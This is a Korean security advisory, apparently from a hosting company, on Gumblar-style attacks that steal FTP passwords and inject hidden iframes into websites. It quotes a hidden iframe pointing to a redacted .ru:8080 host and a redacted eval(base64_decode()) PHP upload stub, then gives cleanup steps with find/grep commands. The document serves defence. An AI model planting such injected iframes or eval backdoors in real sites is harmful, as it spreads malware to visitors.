지금 대부분의 웹서버들은 무작위 비밀번호를 대입하여 알아내는 기본적인 해킹 시도(외국에서 한국으로 하루 평균 서버당 1000회 정도 발생)와 제로보드 옛날버전 등의 업로드 보안 버그 등을 활용하여,국내 스팸 발송 업체들이 스팸 메일 서버로 도용되는 것도 상시 발생하는 상황입니다.

이 두가지는 어느 정도 대처를 하고 있지만(기본적으로 고객의 패치 작업), 요즘은 전혀 대처할 수 없는 해킹이 호스팅업계에서 발생되고 있습니다. 그 해킹 방법은 바로 개발자가가 웹사이트 수정을 위해서 FTP 접속을 하는 순간, 그 암호를 가로채서 해커에게 전송되어 그 암호를 가지고 아주 쉽게 해킹하는 방법입니다.

최근 수개월 동안 다음과 같은 <iframe> 삽입 해킹이 방대하게 발생되고 있는 것입니다.

<div style="display:none"><iframe src="http://???.ru:8080/index.php" width=235 height=558 ></iframe></div>

목적은 특정 사이트의 DDOS 공격용이거나 지속적으로 악성코드를 배포하는 기능으로 사용하고, 그 해킹의 시작은 웹개발자가 웹사이트 수정을 위해 드림위버나 FTP 프로그램을 이용해서 접속함으로써 그 암호가 해커에게 넘어가는 것 같습니다.

이것은 Gumblar(검블러) 혹은 GENO라고 불리는 방법으로, Gumblar 혹은 GENO는 아크로벳과 플래쉬의 보안 패치가 되지 않는 PC가 위와 같은 악성스크립트에 노출된 웹사이트에 접속하는 것만으로 해킹이 성공된다고 합니다.

이 방법은 Adobe Reader Zero-day 취약점이라 불리기도 합니다.

현재까지 네이버 무료 백신을 깔아두어도 완벽하게 검출이나 치료가 되지는 않습니다.

그런데 최근에 gifimg.php 파일명으로 다음과 같은 형식으로 php 코드를 업로드하여 해킹을 시도하는 것도 확인되었습니다.

<?php eval(base64_decode('????));?>

1. 플래쉬( Flash Player )와 아크로벳을 최신버전으로 패치하기
     플래쉬사이트에서 Flash Player 최신버전으로 다시 설치하세요 ( 최신 버전일수록 좋습니다. )

2. 다음으로 웹사이트 변조 파일을 모두 찾기
     가급적 linux command 상에서 다음의 명령어로 필히 찾으시기 바랍니다.
     find . -type f -exec grep -Hn ":8080/" {} \;
     find . -name "*.php*" -exec grep -Hn ":8080/" {} \;
     find . -name "*.htm*" -exec grep -Hn ":8080/" {} \;
     혹은 최근 하루(24시간) 동안 변경된 파일들을 찾아보는 것도 현명한 방법 입니다.
     find . -ctime -24
     찾으셨다면 모두 삭제해 주시기 바랍니다. ( 파일을 일일이 열어서 찾지 않으셔도 됩니다. )

3. 자기 컴퓨터 웹브라우저 캐쉬(temp파일들) 파일을 비우기
     웹브라우저는 캐쉬를 먼저 읽고 웹사이트를 읽기 때문에, 웹사이트가 지워졌나 확인하는 과정에서 다시 바이러스가 동작될 수 있다. ( 물론 플래쉬( Flash Player )와 아크로벳을 최신버전으로 패치를 확실하게 하였고 무료백신 실시간 감시를 돌리고 있으면 걱정하지 않으셔도 됩니다 )

4. PC백신으로 검사 후 접속하였던 FTP 암호를 모두 바꾸기

5. 감염 되었을때의 비밀번호는 다시 쓰지 않기
     이미 그 암호는 해커들에게 비밀번호북DB에 포함시키고 해커들끼리 공유하기에, 두번 다시 그 비밀번호를 사용하지 말아야 합니다. 다른 서버, 다른 계정, 다른 아이디에서 그 패스워드 대입해 보기 때문입니다.